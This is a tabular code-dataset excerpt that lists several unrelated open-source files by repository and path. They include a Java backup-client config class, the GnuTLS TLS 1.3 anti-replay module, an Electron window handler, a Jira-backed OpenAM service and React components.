repo_name
stringlengths 6
101
| path
stringlengths 4
300
| text
stringlengths 7
1.31M
|
|---|---|---|
meks77/ClientServerBackup
|
client/src/main/java/at/meks/backupclientserver/client/ApplicationConfig.java
|
package at.meks.backupclientserver.client;
import at.meks.validation.result.ValidationException;
import com.google.inject.Inject;
import com.google.inject.Singleton;
import java.io.FileInputStream;
import java.io.IOException;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.Arrays;
import java.util.Collections;
import java.util.List;
import java.util.Optional;
import java.util.Properties;
import java.util.Set;
import java.util.stream.Collectors;
import static at.meks.validation.validations.common.CommonValidations.isTrue;
import static at.meks.validation.validations.list.ListValidations.hasMinSize;
import static at.meks.validation.validations.string.StringValidations.isNotBlank;
import static java.lang.String.format;
import static java.util.Arrays.asList;
import static java.util.Optional.ofNullable;
@Singleton
public class ApplicationConfig {
private Properties properties;
@Inject
private FileService fileService;
Path[] getBackupedDirs() {
return getProperties().stringPropertyNames().stream()
.filter(s -> s.startsWith("backupset.dir"))
.map(properties::get)
.map(o -> (String) o)
.map(Paths::get)
.toArray(Path[]::new);
}
public String getServerHost() {
return getProperties().getProperty("server.host");
}
public int getServerPort() {
return ofNullable(getProperties().getProperty("server.port"))
.map(Integer::parseInt)
.orElse(8080);
}
private Properties getProperties() {
if (properties == null) {
initializeProperties();
}
return properties;
}
private void initializeProperties() {
try {
Properties configProps = new Properties();
configProps.load(new FileInputStream(fileService.getConfigFile().toFile()));
properties = configProps;
} catch (IOException e) {
throw new ClientBackupException("couldn't read config file", e);
}
}
void validate() throws ValidationException {
isNotBlank().test(getServerHost()).throwIfInvalid("Config property server.host");
Path[] backupedDirs = getBackupedDirs();
hasMinSize(1).test(asList(backupedDirs)).throwIfInvalid("Configured directories for backup");
for (Path backupedDir : backupedDirs) {
isTrue().test(backupedDir.toFile().exists())
.throwIfInvalid(format("Configured directory %s must exist", backupedDir));
isTrue().test(backupedDir.toFile().isDirectory())
.throwIfInvalid(format("Path %s must be a directory", backupedDir));
}
}
List<String> getPathExcludesForBackup() {
return getProperties().keySet().stream()
.map(o -> (String) o)
.filter(s -> s.startsWith("excludes.exclude"))
.map(key -> (String) getProperties().get(key))
.collect(Collectors.toList());
}
public Set<String> getExcludedFileExtensions() {
Optional<String> extensions = ofNullable(getProperties().get("excludes.fileextensions"))
.map(o -> (String) o);
return extensions
.map(s -> Arrays.stream(s.split(","))
.map(String::trim)
.filter(extension -> extension.length() > 0)
.collect(Collectors.toSet()))
.orElse(Collections.emptySet());
}
public Set<String> getExcludes() {
return getProperties().stringPropertyNames().stream()
.filter(s -> s.startsWith("excludes.exclude"))
.map(properties::get)
.map(o -> (String) o)
.collect(Collectors.toSet());
}
}
|
shuaih7/FabricUI
|
FabricUI/pattern/pattern_utils.py
|
<filename>FabricUI/pattern/pattern_utils.py
#!/usr/bin/python
# -*- coding: utf-8 -*-
'''
Created on 03.02.2021
Updated on 03.18.2021
Author: <EMAIL>
'''
import os
def preprocessResults(results):
boxes = results['boxes']
labels = results['labels']
width = list()
s_boxes = list()
boxes_info = list()
boxes_index = list()
for i, box in enumerate(boxes):
label = labels[i]
if label == 0: # Select the long defects
boxes_info.append((box[0] + box[2]) / 2)
boxes_index.append(i)
width.append(box[2] - box[0])
elif label == 1:
s_boxes.append(box)
pattern = {
'x': boxes_info,
'width': width,
'indices': boxes_index,
's_boxes': s_boxes
}
results['pattern'] = pattern
return results
|
consulo/consulo-sql
|
src/com/dci/intellij/dbn/data/sorting/MultiColumnSortingState.java
|
<filename>src/com/dci/intellij/dbn/data/sorting/MultiColumnSortingState.java
/*
* Copyright 2012-2014 <NAME>
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.dci.intellij.dbn.data.sorting;
import java.util.ArrayList;
import java.util.List;
public class MultiColumnSortingState<T> {
private int maxColumns = 3;
private List<SortingInstruction<T>> sortingInstructions = new ArrayList<SortingInstruction<T>>();
public void applySorting(T column, SortDirection direction, boolean isAddition) {
SortingInstruction<T> instruction = getInstruction(column);
boolean isNewColumn = instruction == null;
if (isNewColumn) {
if (direction.isIndefinite()) {
direction = SortDirection.ASCENDING;
}
instruction = new SortingInstruction<T>(column, direction);
} else {
if (direction.isIndefinite()) {
instruction.switchDirection();
} else {
instruction.setDirection(direction);
}
}
if (isAddition) {
if (isNewColumn) {
if (sortingInstructions.size()== maxColumns) {
sortingInstructions.remove(sortingInstructions.size()-1);
}
sortingInstructions.add(instruction);
}
} else {
sortingInstructions.clear();
sortingInstructions.add(instruction);
}
}
private SortingInstruction<T> getInstruction(T column) {
for (SortingInstruction<T> instruction : sortingInstructions) {
if (instruction.getColumn().equals(column)) {
return instruction;
}
}
return null;
}
public List<SortingInstruction<T>> getSortingInstructions() {
return sortingInstructions;
}
public int getMaxColumns() {
return maxColumns;
}
public void setMaxColumns(int maxColumns) {
this.maxColumns = maxColumns;
if (sortingInstructions.size() > maxColumns) {
sortingInstructions = new ArrayList<SortingInstruction<T>>(sortingInstructions.subList(0, maxColumns));
}
}
public MultiColumnSortingState<T> clone() {
MultiColumnSortingState<T> clone = new MultiColumnSortingState<T>();
for (SortingInstruction<T> criterion : sortingInstructions) {
clone.sortingInstructions.add(criterion.clone());
}
return clone;
}
}
|
TheShellLand/crossover-source
|
gnutls/gnutls/lib/tls13/anti_replay.c
|
/*
* Copyright (C) 2018 Red Hat, Inc.
*
* Author: <NAME>
*
* This file is part of GnuTLS.
*
* The GnuTLS is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public License
* as published by the Free Software Foundation; either version 2.1 of
* the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public License
* along with this program. If not, see <https://www.gnu.org/licenses/>
*
*/
#include "gnutls_int.h"
#include "db.h"
#include "system.h"
#include "tls13/anti_replay.h"
/* The default time window in milliseconds; RFC8446 suggests the order
* of ten seconds is sufficient for the clients on the Internet. */
#define DEFAULT_WINDOW_MS 10000
struct gnutls_anti_replay_st {
uint32_t window;
struct timespec start_time;
gnutls_db_add_func db_add_func;
void *db_ptr;
};
/**
* gnutls_anti_replay_init:
* @anti_replay: is a pointer to #gnutls_anti_replay_t type
*
* This function will allocate and initialize the @anti_replay context
* to be usable for detect replay attacks. The context can then be
* attached to a @gnutls_session_t with
* gnutls_anti_replay_enable().
*
* Returns: Zero or a negative error code on error.
*
* Since: 3.6.5
**/
int
gnutls_anti_replay_init(gnutls_anti_replay_t *anti_replay)
{
*anti_replay = gnutls_calloc(1, sizeof(struct gnutls_anti_replay_st));
if (!*anti_replay)
return gnutls_assert_val(GNUTLS_E_MEMORY_ERROR);
(*anti_replay)->window = DEFAULT_WINDOW_MS;
gnutls_gettime(&(*anti_replay)->start_time);
return 0;
}
/**
* gnutls_anti_replay_set_window:
* @anti_replay: is a #gnutls_anti_replay_t type.
* @window: is the time window recording ClientHello, in milliseconds
*
* Sets the time window used for ClientHello recording. In order to
* protect against replay attacks, the server records ClientHello
* messages within this time period from the last update, and
* considers it a replay when a ClientHello outside of the period; if
* a ClientHello arrives within this period, the server checks the
* database and detects duplicates.
*
* For the details of the algorithm, see RFC 8446, section 8.2.
*
* Since: 3.6.5
*/
void
gnutls_anti_replay_set_window(gnutls_anti_replay_t anti_replay,
unsigned int window)
{
anti_replay->window = window;
}
/**
* gnutls_anti_replay_deinit:
* @anti_replay: is a #gnutls_anti_replay type
*
* This function will deinitialize all resources occupied by the given
* anti-replay context.
*
* Since: 3.6.5
**/
void
gnutls_anti_replay_deinit(gnutls_anti_replay_t anti_replay)
{
gnutls_free(anti_replay);
}
/**
* gnutls_anti_replay_enable:
* @session: is a #gnutls_session_t type.
* @anti_replay: is a #gnutls_anti_replay_t type.
*
* Request that the server should use anti-replay mechanism.
*
* Since: 3.6.5
**/
void
gnutls_anti_replay_enable(gnutls_session_t session,
gnutls_anti_replay_t anti_replay)
{
if (unlikely(session->security_parameters.entity != GNUTLS_SERVER)) {
gnutls_assert();
return;
}
session->internals.anti_replay = anti_replay;
}
int
_gnutls_anti_replay_check(gnutls_anti_replay_t anti_replay,
uint32_t client_ticket_age,
struct timespec *ticket_creation_time,
gnutls_datum_t *id)
{
struct timespec now;
time_t window;
uint32_t server_ticket_age, diff;
gnutls_datum_t key = { NULL, 0 };
gnutls_datum_t entry = { NULL, 0 };
unsigned char key_buffer[MAX_HASH_SIZE + 12];
unsigned char entry_buffer[12]; /* magic + timestamp + expire_time */
unsigned char *p;
int ret;
if (unlikely(id->size > MAX_HASH_SIZE))
return gnutls_assert_val(GNUTLS_E_INTERNAL_ERROR);
gnutls_gettime(&now);
server_ticket_age = timespec_sub_ms(&now, ticket_creation_time);
/* It shouldn't be possible that the server's view of ticket
* age is smaller than the client's view.
*/
if (unlikely(server_ticket_age < client_ticket_age))
return gnutls_assert_val(GNUTLS_E_ILLEGAL_PARAMETER);
/* If ticket is created before recording has started, discard
* reject early data.
*/
if (_gnutls_timespec_cmp(ticket_creation_time,
&anti_replay->start_time) < 0) {
_gnutls_handshake_log("anti_replay: ticket is created before recording has started\n");
return gnutls_assert_val(GNUTLS_E_EARLY_DATA_REJECTED);
}
/* If certain amount of time (window) has elapsed, rollover
* the recording.
*/
diff = timespec_sub_ms(&now, &anti_replay->start_time);
if (diff > anti_replay->window)
gnutls_gettime(&anti_replay->start_time);
/* If expected_arrival_time is out of window, reject early
* data.
*/
if (server_ticket_age - client_ticket_age > anti_replay->window) {
_gnutls_handshake_log("anti_replay: server ticket age: %u, client ticket age: %u\n",
server_ticket_age,
client_ticket_age);
return gnutls_assert_val(GNUTLS_E_EARLY_DATA_REJECTED);
}
/* Check if the ClientHello is stored in the database.
*/
if (!anti_replay->db_add_func)
return gnutls_assert_val(GNUTLS_E_EARLY_DATA_REJECTED);
/* Create a key for database lookup, prefixing window start
* time to ID. Note that this shouldn't clash with session ID
* used in TLS 1.2, because such IDs are 32 octets, while here
* the key becomes 44+ octets.
*/
p = key_buffer;
_gnutls_write_uint32((uint64_t) anti_replay->start_time.tv_sec >> 32, p);
p += 4;
_gnutls_write_uint32(anti_replay->start_time.tv_sec & 0xFFFFFFFF, p);
p += 4;
_gnutls_write_uint32(anti_replay->start_time.tv_nsec, p);
p += 4;
memcpy(p, id->data, id->size);
p += id->size;
key.data = key_buffer;
key.size = p - key_buffer;
/* Create an entry to be stored on database if the lookup
* failed. This is formatted so that
* gnutls_db_check_entry_expire_time() work.
*/
p = entry_buffer;
_gnutls_write_uint32(PACKED_SESSION_MAGIC, p);
p += 4;
_gnutls_write_uint32(now.tv_sec, p);
p += 4;
window = anti_replay->window / 1000;
_gnutls_write_uint32(window, p);
p += 4;
entry.data = entry_buffer;
entry.size = p - entry_buffer;
ret = anti_replay->db_add_func(anti_replay->db_ptr,
(uint64_t)now.tv_sec+(uint64_t)window, &key, &entry);
if (ret < 0) {
_gnutls_handshake_log("anti_replay: duplicate ClientHello found\n");
return gnutls_assert_val(GNUTLS_E_EARLY_DATA_REJECTED);
}
return 0;
}
/**
* gnutls_anti_replay_set_ptr:
* @anti_replay: is a #gnutls_anti_replay_t type.
* @ptr: is the pointer
*
* Sets the pointer that will be provided to db add function
* as the first argument.
**/
void gnutls_anti_replay_set_ptr(gnutls_anti_replay_t anti_replay, void *ptr)
{
anti_replay->db_ptr = ptr;
}
/**
* gnutls_anti_replay_set_add_function:
* @anti_replay: is a #gnutls_anti_replay_t type.
* @add_func: is the function.
*
* Sets the function that will be used to store an entry if it is not
* already present in the resumed sessions database. This function returns 0
* if the entry is successfully stored, and a negative error code
* otherwise. In particular, if the entry is found in the database,
* it returns %GNUTLS_E_DB_ENTRY_EXISTS.
*
* The arguments to the @add_func are:
* - %ptr: the pointer set with gnutls_anti_replay_set_ptr()
* - %exp_time: the expiration time of the entry
* - %key: a pointer to the key
* - %data: a pointer to data to store
*
* The data set by this function can be examined using
* gnutls_db_check_entry_expire_time() and gnutls_db_check_entry_time().
*
* Since: 3.6.5
**/
void
gnutls_anti_replay_set_add_function(gnutls_anti_replay_t anti_replay,
gnutls_db_add_func add_func)
{
anti_replay->db_add_func = add_func;
}
|
dotnetweekly/dnw-api
|
endpoint-public/handlers/user/unsubscribe.js
|
<filename>endpoint-public/handlers/user/unsubscribe.js<gh_stars>0
const sanitize = require('mongo-sanitize');
const Guid = require("guid");
const UserModel = require("../../../db/models/user.model");
const NotFoundError = require("../../../error/not-found");
const UnauthorizedError = require("../../../error/unauthorized");
const unsubscribe = function(req, callback) {
const key = sanitize(req.body.key);
UserModel.findOne({ keyUnsubscribe: key, isActive: true }, function(error, user) {
if (error || !user) {
callback.onSuccess({ error: "User not found or not activated yet." });
return;
}
user.subscribed = false;
user.keyUnsubscribe = Guid.raw();
user.save(function(err) {
callback.onSuccess({});
});
});
};
module.exports = unsubscribe;
|
zurawiki/netlify-cms
|
src/components/EditorWidgets/DateTime/DateTimeControl.js
|
<filename>src/components/EditorWidgets/DateTime/DateTimeControl.js
import React from 'react';
import PropTypes from 'prop-types';
import DateControl from 'EditorWidgets/Date/DateControl';
export default class DateTimeControl extends React.Component {
static propTypes = {
field: PropTypes.object.isRequired,
onChange: PropTypes.func.isRequired,
classNameWrapper: PropTypes.string.isRequired,
setActiveStyle: PropTypes.func.isRequired,
setInactiveStyle: PropTypes.func.isRequired,
value: PropTypes.oneOfType([
PropTypes.object,
PropTypes.string,
]),
format: PropTypes.string,
};
render() {
const {
field,
format,
onChange,
value,
classNameWrapper,
setActiveStyle,
setInactiveStyle
} = this.props;
return (
<DateControl
onChange={onChange}
format={format}
value={value}
field={field}
classNameWrapper={classNameWrapper}
setActiveStyle={setActiveStyle}
setInactiveStyle={setInactiveStyle}
includeTime
/>
);
}
}
|
seniortesting/cheatsheet-startup-parent
|
cheatsheet-startup-js/nuxt-desktop/src/main/BrowserWinHandler.js
|
<filename>cheatsheet-startup-js/nuxt-desktop/src/main/BrowserWinHandler.js
import { EventEmitter } from 'events'
import { BrowserWindow, app } from 'electron'
import customUI from './customUI'
import i18n from './i18n'
const isProduction = process.env.NODE_ENV === 'production'
export default class BrowserWinHandler {
/**
* @param [options] {object} - browser window options
* @param [allowRecreate] {boolean}
*/
constructor (options, allowRecreate = true) {
this._eventEmitter = new EventEmitter()
this.allowRecreate = allowRecreate
this.options = options
this.browserWindow = null
this.appTray = null
this._createInstance()
}
_createInstance () {
// This method will be called when Electron has finished
// initialization and is ready to create browser windows.
// Some APIs can only be used after this event occurs.
app.on('ready', () => {
this._create()
})
// On macOS it's common to re-create a window in the app when the
// dock icon is clicked and there are no other windows open.
if (!this.allowRecreate) { return }
app.on('activate', () => this._recreate())
// Add support for system tray
app.on('window-all-closed', function () {
// destory the tray icon
if (this.appTray) { this.appTray.destroy() }
// 在OSX中经常是用户虽然关闭了主窗口,但是仍然希望使用Menu Bar,因此这里不进行强行关闭
if (process.platform !== 'darwin') {
app.quit()
}
})
}
_create () {
this.browserWindow = new BrowserWindow(
{
...this.options,
webPreferences: {
...this.options.webPreferences,
webSecurity: isProduction, // disable on dev to allow loading local resources
allowRunningInsecureContent: true,
allowDisplayingInsecureContent: true,
plugins: true, // BrowserWindow.addExtension
defaultFontSize: 18, // default is 16
defaultEncoding: 'UTF-8',
nodeIntegration: true, // allow loading modules via the require () function
devTools: !process.env.SPECTRON // disable on e2e test environment
}
}
)
/**
* <NAME>: application menu,auto update check, system tray
*
*/
customUI.setApplicationMenu()
this.appTray = customUI.createTray()
customUI.createUpdates()
this.browserWindow.on('close', (event) => {
// Dereference the window object
// this.browserWindow = null
app.isQuitting = true
if (!app.isQuitting) {
event.preventDefault()
process.platform === 'darwin' ? app.hide() : this.browserWindow.hide()
customUI.displayTrayBalloon('', i18n.t('tray-hide-message'))
} else {
app.quit()
}
})
this.browserWindow.on('minimize', (event) => {
event.preventDefault()
process.platform === 'darwin' ? app.hide() : this.browserWindow.hide()
customUI.displayTrayBalloon('', i18n.t('tray-hide-message'))
})
this.browserWindow.on('show', function () {
// this.appTray.setHighlightMode('selection')
})
this.browserWindow.webContents.once('did-frame-finish-load', () => {
// Initate auto-updates on MacOS and Windows
// log.info('check updating when start the page...')
customUI.checkUpdates()
})
this.browserWindow.webContents.on('crashed', function () {
// crash report
})
// end
this._eventEmitter.emit('created')
}
_recreate () {
if (this.browserWindow === null) { this._create() }
}
/**
* @callback onReadyCallback
* @param {BrowserWindow}
*/
/**
*
* @param callback {onReadyCallback}
*/
onCreated (callback) {
this._eventEmitter.once('created', () => {
callback(this.browserWindow)
})
}
/**
*
* @returns {Promise<BrowserWindow>}
*/
created () {
return new Promise((resolve) => {
this._eventEmitter.once('created', () => {
resolve(this.browserWindow)
})
})
}
}
|
navikt/dolly-backend
|
dolly-backend-app/src/main/java/no/nav/dolly/service/OpenAmService.java
|
package no.nav.dolly.service;
import static java.lang.String.format;
import static java.nio.charset.StandardCharsets.UTF_8;
import lombok.RequiredArgsConstructor;
import lombok.extern.slf4j.Slf4j;
import no.nav.dolly.domain.jira.AllowedValue;
import no.nav.dolly.domain.jira.Field;
import no.nav.dolly.domain.jira.Fields;
import no.nav.dolly.domain.jira.JiraResponse;
import no.nav.dolly.domain.jira.Project;
import no.nav.dolly.domain.resultset.RsOpenAmResponse;
import no.nav.dolly.exceptions.JiraException;
import no.nav.dolly.consumer.jira.JiraConsumer;
import org.codehaus.jettison.json.JSONException;
import org.codehaus.jettison.json.JSONObject;
import org.springframework.core.io.FileSystemResource;
import org.springframework.http.HttpEntity;
import org.springframework.http.HttpMethod;
import org.springframework.http.HttpStatus;
import org.springframework.http.MediaType;
import org.springframework.http.ResponseEntity;
import org.springframework.stereotype.Service;
import org.springframework.util.LinkedMultiValueMap;
import org.springframework.web.client.HttpStatusCodeException;
import java.io.File;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.OutputStreamWriter;
import java.io.Writer;
import java.util.List;
@Slf4j
@Service
@RequiredArgsConstructor
public class OpenAmService {
private static final String ISSUE_CREATE = "/rest/api/2/issue";
private static final String METADATA = "/createmeta?projectKeys=DEPLOY&issuetypeIds=16001&expand=projects.issuetypes.fields";
private static final String ATTACHMENTS = "/attachments";
private static final String BROWSE = "/browse";
private static final String FEILMELDING = "En feil oppsto. Bestilling kan ikke utføres.";
private static final String FEILMELDING_UKJENT_MILJOE = "Angitt miljø eksisterer ikke.";
private final JiraConsumer jiraConsumer;
public RsOpenAmResponse opprettIdenter(List<String> identliste, String miljoe) {
try {
Fields fields = readOpenAmMetadata();
ResponseEntity<JiraResponse> createResponse = createIssue(miljoe, fields);
ResponseEntity<String> attachmentResponse = createAttachment(identliste, createResponse);
return RsOpenAmResponse.builder()
.miljoe(miljoe)
.status(attachmentResponse.getStatusCode())
.httpCode(attachmentResponse.getStatusCode().value())
.message(HttpStatus.OK.value() == attachmentResponse.getStatusCodeValue() &&
createResponse.getBody() != null ?
format("%s%s/%s", jiraConsumer.getBaseUrl(), BROWSE, createResponse.getBody().getKey()) : null)
.build();
} catch (JiraException e) {
return RsOpenAmResponse.builder()
.miljoe(miljoe)
.status(e.getStatusCode())
.message(e.getStatusText())
.httpCode(e.getStatusCode().value())
.build();
} catch (HttpStatusCodeException e) {
log.error(e.getMessage(), e);
return RsOpenAmResponse.builder()
.miljoe(miljoe)
.status(e.getStatusCode())
.message(FEILMELDING)
.httpCode(e.getStatusCode().value())
.build();
}
}
private ResponseEntity<String> createAttachment(List<String> identliste, ResponseEntity<JiraResponse> createResponse) {
LinkedMultiValueMap<String, Object> params = new LinkedMultiValueMap<>();
params.add("file", new FileSystemResource(createIdentsFile(identliste)));
if (createResponse != null && createResponse.getBody() != null) {
return jiraConsumer.excuteRequest(
format("%s/%s%s", ISSUE_CREATE, createResponse.getBody().getKey(), ATTACHMENTS),
HttpMethod.POST, new HttpEntity<>(params, jiraConsumer.createHttpHeaders(MediaType.MULTIPART_FORM_DATA, createResponse.getHeaders())), String.class);
} else {
log.error("Mottatt tom response body paa createIssue.");
throw new JiraException(HttpStatus.INTERNAL_SERVER_ERROR, FEILMELDING);
}
}
private ResponseEntity<JiraResponse> createIssue(String miljoe, Fields fields) {
String envId = null;
if (fields == null || isInvalid(fields.getCustomfield_14811()) || isInvalid(fields.getProject()) || isInvalid(fields.getIssuetype())) {
log.error("En eller flere nødvendige felter i metadata er null.");
throw new JiraException(HttpStatus.INTERNAL_SERVER_ERROR, FEILMELDING);
}
for (AllowedValue allowedValue : fields.getCustomfield_14811().getAllowedValues()) {
if (miljoe.equals(allowedValue.getValue())) {
envId = allowedValue.getId();
break;
}
}
if (envId == null) {
throw new JiraException(HttpStatus.BAD_REQUEST, FEILMELDING_UKJENT_MILJOE);
}
String request = null;
try {
request = new JSONObject()
.put("fields", new JSONObject()
.put("summary", "Opprett testbrukere fra Dolly")
.put("project", new JSONObject()
.put("id", fields.getProject().getAllowedValues().get(0).getId())
.put("key", fields.getProject().getAllowedValues().get(0).getKey()))
.put("issuetype", new JSONObject()
.put("id", fields.getIssuetype().getAllowedValues().get(0).getId()))
.put("customfield_14811", new JSONObject()
.put("id", envId))
).toString();
} catch (JSONException e) {
log.error(e.getMessage(), e);
}
return jiraConsumer.excuteRequest(ISSUE_CREATE, HttpMethod.POST,
new HttpEntity<>(request, jiraConsumer.createHttpHeaders(MediaType.APPLICATION_JSON)), JiraResponse.class);
}
private boolean isInvalid(Field field) {
return field == null || field.getAllowedValues().isEmpty();
}
private Fields readOpenAmMetadata() {
ResponseEntity<Project> metadata = jiraConsumer.excuteRequest(format("%s%s", ISSUE_CREATE, METADATA), HttpMethod.GET,
new HttpEntity<>("", jiraConsumer.createHttpHeaders(MediaType.APPLICATION_JSON)), Project.class);
if (metadata != null && metadata.getBody() != null && isMetadataNotEmpty(metadata)) {
return metadata.getBody().getProjects().get(0).getIssuetypes().get(0).getFields();
} else {
log.error("En eller flere nødvendige felter i metadata er null.");
throw new JiraException(HttpStatus.INTERNAL_SERVER_ERROR, FEILMELDING);
}
}
private boolean isMetadataNotEmpty(ResponseEntity<Project> metadata) {
return !metadata.getBody().getProjects().isEmpty() && !metadata.getBody().getProjects().get(0).getIssuetypes().isEmpty();
}
private File createIdentsFile(List<String> identliste) {
File tempFile = null;
try {
tempFile = File.createTempFile("OpenAM-", ".txt");
try (Writer writer = new OutputStreamWriter(new FileOutputStream(tempFile), UTF_8)) {
for (String ident : identliste) {
writer.write(format("%s;4;n;e;%n", ident));
}
}
} catch (IOException e) {
log.error(e.getMessage(), e);
}
return tempFile;
}
}
|
ryanmdoyle/class-karma
|
web/src/components/svg/Manage/Manage.js
|
<reponame>ryanmdoyle/class-karma
const Manage = ({ width }) => {
return (
<svg
id="a91fd4ba-2994-4174-ad77-9b89e961cfb5"
data-name="Layer 1"
xmlns="http://www.w3.org/2000/svg"
width={width}
height={0.57 * width}
viewBox="0 0 802 462.41497"
>
<circle cx="775.0907" cy="21.98023" r="6.46689" fill="#f2f2f2" />
<circle cx="749.31739" cy="21.98023" r="6.46689" fill="#f2f2f2" />
<circle cx="723.54409" cy="21.98023" r="6.46689" fill="#f2f2f2" />
<circle cx="697.77079" cy="21.98023" r="6.46689" fill="#f2f2f2" />
<circle cx="775.0907" cy="48.98023" r="6.46689" fill="#f2f2f2" />
<circle cx="749.31739" cy="48.98023" r="6.46689" fill="#f2f2f2" />
<circle cx="723.54409" cy="48.98023" r="6.46689" fill="#f2f2f2" />
<circle cx="697.77079" cy="48.98023" r="6.46689" fill="#f2f2f2" />
<circle cx="775.0907" cy="75.98023" r="6.46689" fill="#f2f2f2" />
<circle cx="749.31739" cy="75.98023" r="6.46689" fill="#f2f2f2" />
<circle cx="723.54409" cy="75.98023" r="6.46689" fill="#f2f2f2" />
<circle cx="697.77079" cy="75.98023" r="6.46689" fill="#f2f2f2" />
<circle cx="775.0907" cy="102.98023" r="6.46689" fill="#f2f2f2" />
<circle cx="749.31739" cy="102.98023" r="6.46689" fill="#f2f2f2" />
<circle cx="723.54409" cy="102.98023" r="6.46689" fill="#f2f2f2" />
<circle cx="697.77079" cy="102.98023" r="6.46689" fill="#f2f2f2" />
<circle cx="775.0907" cy="129.98023" r="6.46689" fill="#f2f2f2" />
<circle cx="749.31739" cy="129.98023" r="6.46689" fill="#f2f2f2" />
<circle cx="723.54409" cy="129.98023" r="6.46689" fill="#f2f2f2" />
<circle cx="697.77079" cy="129.98023" r="6.46689" fill="#f2f2f2" />
<circle cx="775.0907" cy="156.98023" r="6.46689" fill="#f2f2f2" />
<circle cx="749.31739" cy="156.98023" r="6.46689" fill="#f2f2f2" />
<circle cx="723.54409" cy="156.98023" r="6.46689" fill="#f2f2f2" />
<circle cx="697.77079" cy="156.98023" r="6.46689" fill="#f2f2f2" />
<path
d="M963.08261,664.75326c4.66847-10.08357,9.33339-20.31665,11.35946-31.24223s1.17568-22.78292-4.627-32.25931-17.22813-15.90241-28.13153-13.76022c-8.95531,1.75944-16.146,8.81268-20.3565,16.90992s-5.89977,17.23013-7.53739,26.20852c-.52917-10.20009-1.0896-20.56435-4.478-30.19975s-10.06044-18.61462-19.5694-22.34312-21.87885-.79648-26.8906,8.1032c-7.06074,12.53817,2.30154,30.12541-5.81734,42.0058-1.39265-11.917-13.85471-21.33234-25.69879-19.41591s-20.7011,14.78128-18.26461,26.52941c1.44978,6.99047,6.21931,12.9363,11.92157,17.232s12.33421,9.27436,18.89475,12.09Z"
transform="translate(-199 -218.79252)"
fill="#f2f2f2"
/>
<path
d="M819.28955,617.17978c9.40826,3.28851,18.903,6.61425,27.49227,11.75557,7.698,4.60787,14.553,10.81188,18.8823,18.75691A33.35557,33.35557,0,0,1,869.79,661.55087c.06251,1.01759,1.65458,1.02469,1.59163,0-.55661-9.061-4.97237-17.353-11.087-23.91075-6.70405-7.18985-15.39158-12.10041-24.36109-15.91043-5.31822-2.259-10.7686-4.179-16.2208-6.08469-.96888-.33865-1.3854,1.19843-.42312,1.53478Z"
transform="translate(-199 -218.79252)"
fill="#fff"
/>
<path
d="M873.55713,579.64682a143.38212,143.38212,0,0,1,13.79113,30.61558,145.11719,145.11719,0,0,1,6.361,32.96845,143.30729,143.30729,0,0,1,.15151,18.83686c-.05906,1.02328,1.53277,1.01988,1.59163,0a145.19461,145.19461,0,0,0-2.04032-33.82049,146.92709,146.92709,0,0,0-9.769-32.44023,143.25218,143.25218,0,0,0-8.71162-16.96349.79641.79641,0,0,0-1.37433.80332Z"
transform="translate(-199 -218.79252)"
fill="#fff"
/>
<path
d="M951.45771,588.78939a232.04324,232.04324,0,0,0-17.11647,57.57848q-1.34226,8.36487-2.07792,16.81182c-.089,1.02022,1.50317,1.01425,1.59163,0a231.20893,231.20893,0,0,1,12.73788-58.02528q2.83381-7.89209,6.23921-15.56169c.41206-.92792-.959-1.73863-1.37433-.80333Z"
transform="translate(-199 -218.79252)"
fill="#fff"
/>
<path
d="M1000,664.48614H200a1,1,0,0,1,0-2h800a1,1,0,0,1,0,2Z"
transform="translate(-199 -218.79252)"
fill="#3f3d56"
/>
<path
d="M613.26258,409.33537H474.534a7.53,7.53,0,0,1-7.52143-7.52142v-175.5a7.53,7.53,0,0,1,7.52143-7.52143H613.26258A7.53,7.53,0,0,1,620.784,226.314v175.5A7.53,7.53,0,0,1,613.26258,409.33537ZM474.534,220.464a5.85656,5.85656,0,0,0-5.85,5.85v175.5a5.85657,5.85657,0,0,0,5.85,5.85H613.26258a5.85658,5.85658,0,0,0,5.85-5.85v-175.5a5.85657,5.85657,0,0,0-5.85-5.85Z"
transform="translate(-199 -218.79252)"
fill="#3f3d56"
/>
<path
d="M532.35815,303.15094h-30.537a3.76489,3.76489,0,0,1-3.76071-3.76071V263.35454a3.7649,3.7649,0,0,1,3.76071-3.76072h30.537a3.7649,3.7649,0,0,1,3.76071,3.76072v36.03569A3.76489,3.76489,0,0,1,532.35815,303.15094Z"
transform="translate(-199 -218.79252)"
fill="#6c63ff"
/>
<path
d="M591.69386,319.86523h-30.537a3.7649,3.7649,0,0,1-3.76072-3.76072V280.06882a3.76489,3.76489,0,0,1,3.76072-3.76071h30.537a3.76489,3.76489,0,0,1,3.76072,3.76071v36.03569A3.7649,3.7649,0,0,1,591.69386,319.86523Z"
transform="translate(-199 -218.79252)"
fill="#ccc"
/>
<path
d="M544.05815,370.8438h-30.537a3.7649,3.7649,0,0,1-3.76071-3.76072V331.04739a3.76489,3.76489,0,0,1,3.76071-3.76071h30.537a3.76489,3.76489,0,0,1,3.76071,3.76071v36.03569A3.7649,3.7649,0,0,1,544.05815,370.8438Z"
transform="translate(-199 -218.79252)"
fill="#ff6584"
/>
<circle cx="115.93074" cy="11.82028" r="6.46689" fill="#f2f2f2" />
<circle cx="115.93074" cy="37.59358" r="6.46689" fill="#f2f2f2" />
<circle cx="115.93074" cy="63.36688" r="6.46689" fill="#f2f2f2" />
<circle cx="115.93074" cy="89.14018" r="6.46689" fill="#f2f2f2" />
<circle cx="142.93074" cy="11.82028" r="6.46689" fill="#f2f2f2" />
<circle cx="142.93074" cy="37.59358" r="6.46689" fill="#f2f2f2" />
<circle cx="142.93074" cy="63.36688" r="6.46689" fill="#f2f2f2" />
<circle cx="142.93074" cy="89.14018" r="6.46689" fill="#f2f2f2" />
<circle cx="169.93074" cy="11.82028" r="6.46689" fill="#f2f2f2" />
